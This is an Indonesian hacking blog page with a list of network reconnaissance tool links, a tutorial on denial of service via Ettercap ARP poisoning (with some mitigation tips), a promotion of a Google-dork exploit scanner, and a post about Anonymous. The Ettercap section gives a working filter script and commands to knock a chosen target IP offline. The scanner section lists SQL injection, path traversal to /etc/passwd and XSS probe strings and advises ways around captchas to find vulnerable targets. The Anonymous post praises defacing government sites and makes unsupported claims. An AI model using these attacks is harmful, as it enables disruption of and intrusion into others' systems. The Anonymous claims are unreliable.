Rabu, 09 Oktober 2013

Tools Online


nie ane mau share tools online buat agan-agan sekalian..
moga aja bermanfaat.
ya udahhh langsung aje ke Lokasi'a br0..
  
PICTURE To ASCII Convert -
http://picascii.com

Whois - IP Address - Domain Name Lookup -
http://cqcounter.com/whois/

AdHoc IP Tools
http://tatumweb.com/iptools.htm

Ben's Web Utilities
http://www.phaster.com/find_info_net_traffic.html

central OPS
http://centralops.net/co/

dihe's IP Indexhttp://ipindex.homelinux.net/index.phpDomain Tools
http://www.domaintools.com/

Global Whois Search
http://www.ratite.com/whois/whois.html

Multi DNS Lookup (Bankes.com)
http://www.bankes.com/nslookup.htm

Network Solutions
http://www.networksolutions.com/whois/index.jsp

Public DNS Servers List
http://80.247.230.136/dns.htm

BGPPlay
http://www.ris.ripe.net/bgplay/

BrowserSpy
http://browserspy.dk/

CERT Station
http://browserspy.dk/

CIDR Reports (ASN & BGP Info)
http://www.cidr-report.org/as2.0/

CodeFlux Tools (SSL lookups)
http://codeflux.com/exec/tools/

Command Line Reference Page
http://www.ss64.com/

Country to IP Address Reference
http://www.proxyserverprivacy.com/ipaddress_range.php

Default Password List (another)
http://www.cyxla.com/passwords/passwords.html

DiG Gateway
http://www.spacereg.com/a.rpl?m=dig

digitalpoint DNS Zone Xfer
http://www.digitalpoint.com/tools/zone-transfer/

Fixed Orbit (ASN & BGP Info)
http://www.fixedorbit.com/search.htm

GeekTools (Does DNS AXFR)
http://www.geektools.com/tools.php

Graphical DNS Tools
http://www.zonecut.net/

HTTP Viewer
http://www.rexswain.com/httpview.html

InfoSysSec Online Tools
http://www.infosyssec.com/infosyssec/ipsectools.htm

Internet Topology Tools
http://www.caida.org/tools/taxonomy/topotaxonomy.xml

MD5 Hash Reverse Engineering Site
http://md5.rednoize.com/

Bermacam-macam ini cuy tinggal pilih
http://www.cybersnipers.com

Netcraft
http://news.netcraft.com/

Network-Tools (Does SSL lookups and chaos queries too)
http://www.us.sorbs.net/lookup.shtml

T1 Shopper Online Port Scanner
http://www.t1shopper.com/tools/

TechnicalInfo
http://www.technicalinfo.net/tools/index.html

Tiny URL (URL Decoder)
http://tinyurl.com/

TrimWare Online Tools
http://www.trimmail.com/news/tools/

User Agent Strings
http://www.useragentstring.com

Web Based Network Tools
http://home.planet.nl/%7Ehouwe135/wbnt1/

Web Probe
http://www.securityspace.com/sprobe/probe.html

Web Sniffer
http://web-sniffer.net/

Well Known Ports (plus trojans!)
http://www.neohapsis.com/neolabs/neo-ports/

Windows Event Id's
http://eventid.net/
Tidak ada komentar: Labels:

Cara DDOS dengan Ettercap dan Cara Antisipasinya

Sekedar kasih tau cara melakukan DOS menggunakan Ettercap, tanpa basa-basi kita langsung meluncur keTKP.
1. Buka Gedit (atau file editor apapun) kemudian tulis perintah copas perintah dibawah ini.
-------------------------------------------------------------------------------------------
if(ip.src == ‘IP_TARGET’ || ip.dst == ‘IP_TARGET’) {
drop();
kill();
msg(“Gilakomputer mencoba menyerang !!\n”);
}
-------------------------------------------------------------------------------------------

ganti IP_TARGET dengan IP Address target yang akan diserang kemudian simpan dengan nama dos.eft
2. Convert file dos.eft menjadi dos.ef
etterfilter dos.eft -o dos.ef
3. Lakukan serangan
ettercap -T -q -F /root/dos.ef -M ARP /IP_TARGET/ // -i kartu_jaringan
Catatan:
serangan ettercap ini secara default hanya bisa dilakukan di jaringan lokal, alias jaringan dengan satu subnet. Kemungkinan besar ada cara untuk menforward paket-paket serangan keluar, tapi belum dicari dan dicoba Wink
Begitu dos-attack dimulai, ettercap akan mem-broadcast pesan untuk mengecek apakah “fake-ip” sudah digunakan atau belum. Jika “fake-address belum ada yang memakai, maka ettercap akan men-spoof komputer server dengan mengirimkan sebuah paket yang menyatakan bahwa ip-address “fake-ip” ada di MAC address sekian. Dimana MAC address nya adalah MAC address komputer penyerang.Namun, apabila “fake-address” sudah terpakai, maka ettercap akan menipu server target dengan mengatakan bahwa “fake-ip” ada di MAC address komputer penyerang.
Setelah server target tertipu ARP dan MAC addressnya, langkah selanjutnya oleh ettercap adalah men-scan port TCP yang terbuka pada server target.
Setelah ini baru kemudian ettercap men-flood port pada server target dengan packet SYN. paket dimodifikasi sehingga memiliki IP-Address asal “fake-ip” Jika server target berupaya untuk me-reply packet SYN tersebut, ettercap sudah menyiapkan ARP-reply palsu untuk mencegat balasan dari server target sehingga tidak sampai ke host dengan alamat “fake-ip”
>>Hasil yang diakibatkan<<
Ada bermacam-macam efek tergantung pada konfigurasi server target dan kondisi service-service yang aktif. Pada server tanpa firewall dengan service apache2, mysql, ssh, samba, X, maka akan hang total. Mouse macet-macet sehingga tidak bisa digunakan. Yodi menyebut kondisi ini dengan istilah “teler”. Minimal, service yang disediakan oleh server akan melambat. Windows XP SP2 dengan apache, mysql, dan php tidak hang tetapi service http mati total.

Cara Antisipasi Serangan DOS dengan Ettercap
tadi ane sudah jelasin tentang cara DOS dengan menggunakan ettercap, nah sekarang kita belajar tentang gimana cara mengantisipasi serangan DOS dengan ettercap, berikut caranya :
Dengan mengaktifkan rp_filter pada kernel. Caranya sederhana:--------------------------------------------------------------------------------------
#cat 1 &gt; /proc/sys/net/ipv4/conf/all/rp_filter
atau gunakan script berikut:
for f in /proc/sys/net/ipv4/conf/*/rp_filter; do
echo 1 &gt; $f
done
---------------------------------------------------------------------------------------
untuk memastikan rp_filter aktif pada semua device.
Apa itu rp_filter?
rp_filter adalah sebuah flag(penanda) pada kernel yang bertipe boolean (0 berarti FALSE, 1 berarti TRUE). Ketika rp_filter flah bernilai 1(TRUE), maka setiap paket ARP yang datang ke komputer akan dicek asal-muasal kedatangannya, sebelum paket tersebut diproses lebih lanjut.
Mengaktifkan firewall dengan iptables.
Buat default policy adalah REJECT dengan command berikut:
#iptables –policy INPUT DROP
#iptables –policy OUTPUT DROP
#iptables –policy FORWARD DROP
Kemudian perbolehkan host lain mengakses service pada port yang diperbolehkan, misalnya port 80:
#iptables -A INPUT -p tcp –dport 80 -j ACCEPT
Kedua cara diatas untuk sementara ini sudah berhasil mengatasi serangan ettercap dos_attack. Namun, mungkin kedepannya harus terus dikembangkan proteksi-proteksi yang lebih mantap tapi fleksibel demi mencapai keamanan server dan kenyamanan pengakses sah server.
sekian tutor dari saya dan semoga bermanfaat buat agan-agan sekalian.
Tidak ada komentar: Labels:

XCode sql injection















ini yg suka saya pake.. :D tools dari XCode.. walaupun saya bukan anak XCode tapi saya bangga dengan karya mereka :D Yang tentunya karya-kaya anak dalam negri harus di apresiasi betul ??? tool ini bagus untuk mencari web yang vuln ...
langsung aja sedoot...
Download XCode Exploits Scanner
PENGGUNAAN
Setelah download, ekstrak semua filenya dan jalankan XCodeXploitScanner.exe, Klik Dork It dan Tool ini akan mengumpulkan Link dari Dork yang anda masukkan kemudian menampilkan listnya. setelah selesai menampilkan List, Anda akan bisa melakukan scanning kerentanan SQL injection/Local File Inclusion/Cross Site Scripting pada web yang ada di list. Tool ini akan mengirimkan parameter injeksi ke web seperti ‘ – * /../../../../../../../../../../../../../../etc/passwd , “>alert(“XSS DETECTED XCode Exploit Scanner”) . Jika Web tersebut memiliki bug maka di status akan muncul : www.target.com?blabla.php?=1234 : SQLi Vulnerable.
www.target.com?blabla.php?=1234/../../../../../../../../../../../../../../etc/passwd LFI Vulnerable
www.target.com?blabla.php?=1234″>alert(“XXS DETECTED XCode Exploit Scanner”) XSS Vulnerable
Pada status list yang terdeteksi, anda bisa klik Open Vuln Link with Browser untuk menampilkan web pada browser anda
Tool ini juga menambahkan webshell hunter, dimana anda bisa mencari web shell c99, r57, c100, ITsecteam_shell, b374k, yang telah diupload oleh hacker.
Jika pada daftar “Google results” tidak memunculkan hasil, coba beberapa trik dibawah ini:

[1] ganti search path dari “/cse?FORID:1&q=” ke “/search?q=
[2] klik “Show captcha” dan isi kode bypass tersebut.
[3] ganti domain google contoh: dari com to co.id , com.br, fr, co.th, com.ch dan lain sebagainya

Mungkin masih banyak kekurangan atau Bug yang belum diketahui oleh penulis. Tapi setidaknya tool ini bisa mempermudah anda untuk mencari target.
Semoga Berguna..
Tidak ada komentar: Labels:

Siapakah Anonymous

             Pernahkah kalian mendengar kata "anonymous"? Secara bahasa, anonymous berarti tanpa nama. Anonymous menjadi salah satu dari sekian banyak orang paling berpengaruh di dunia

Anonymous adalah sekumpulan hacktivist yang dibentuk tahun 2003. Selain itu, anonymous juga dikenal sebagai Aktivis Anti Illuminati. Kita semua bisa menjadi anonymous karena anonymous tidak memiliki pemimpin dan struktur organisasi.

TOPENG KHUSUS ANONYMOUS
Ciri khas Anonymous yaitu topeng khusus yang dipakainya. Topeng itu bernama Guy Fawkes atau V For Vendeta. Ciri - ciri dari topeng V For Vendeta yaitu :
1. Desainnya seperti wajah
2. Desainnya selalu tersenyum
3. Pipinya dicat warna merah layaknya seorang pemalu
4. Selalu berjenggot dan berkumis
5. Raut wajah ceria
Nama V For Vendeta diangkat dari sebuah film berjudul V FOR VENDETTA karya Alan Moore dan David Lloyd yang menceritakan seseorang yang berinisial V yang berjuang menghancurkan rezim pemerintahan otoriter Inggris. Film ini disutradarai oleh James McTeigui, diperankan oleh Natalie Portman dan Hugo Weaving.
PAKAIAN KHUSUS ANONYMOUS

Seperti yang kalian ketahui, Anonymous selalu mengenakan pakaian khas berwarna hitam yang biasa disebut dengan tuxedo serta mengenakan dasi
LAMBANG ORGANISASI KHUSUS ANONYMOUS

Anonymous mempunyai lambang tertentu seperti gambar diatas. Makna lambang tersebut yaitu :
1. Pakaian Tuxedo = Pakaian yang sering dipakai oleh anonymous
2. Tanda ? = Identitas dari mereka tidak diketahui dan sulit dilacak (tersembunyi)
3. Bumi = Mereka adalah penyelamat dunia dengan beraksi lewat dunia maya
4. 2 padi kiri dan kanan = Tujuan mereka untuk memberikan kesejahteraan bagi dunia
5. Lingkaran = Semua lambang yang ada didalamnya merupakan tujuan adanya anonymous
SLOGAN KHUSUS ANONYMOUS

Anonymous juga memiliki slogan khusus yang menarik. Seperti yang ada pada gambar diatas, slogan tersebut berbunyi :

No. Inggris Indonesia
1. We Are Anonymous Kami Adalah Tanpa Nama
2. We Are Legion Kami Adalah Pasukan
3. We Do Not Forgive Kami Tidak Mengampuni
4. We Do Not Forget Kami Tidak Lupa
5. Expect Us Harapkan Kami

TUJUAN ANONYMOUS
Anonymous dibentuk karena memiliki tujuan, yaitu melindungi hak - hak kebebasan dan hak asasi manusia dengan melakukan protes kepada pemerintahan melalui penyerangan situs - situs pemerintahan yang mencamtumkan pesan pada hasil hacking pada situs yang telah di deface. Hacktivist ini akan melakukan segala cara untuk melakukan perlawanan sampai akhir apapun yang terjadi.

Dan yang perlu diketahui tentang Anonymous, Anonymous sangat membenci Illuminati.
Tidak ada komentar: Labels:
Langganan: Postingan (Atom)
Copyright © 2013-2014 cybervirburg32 | powered by: Blogger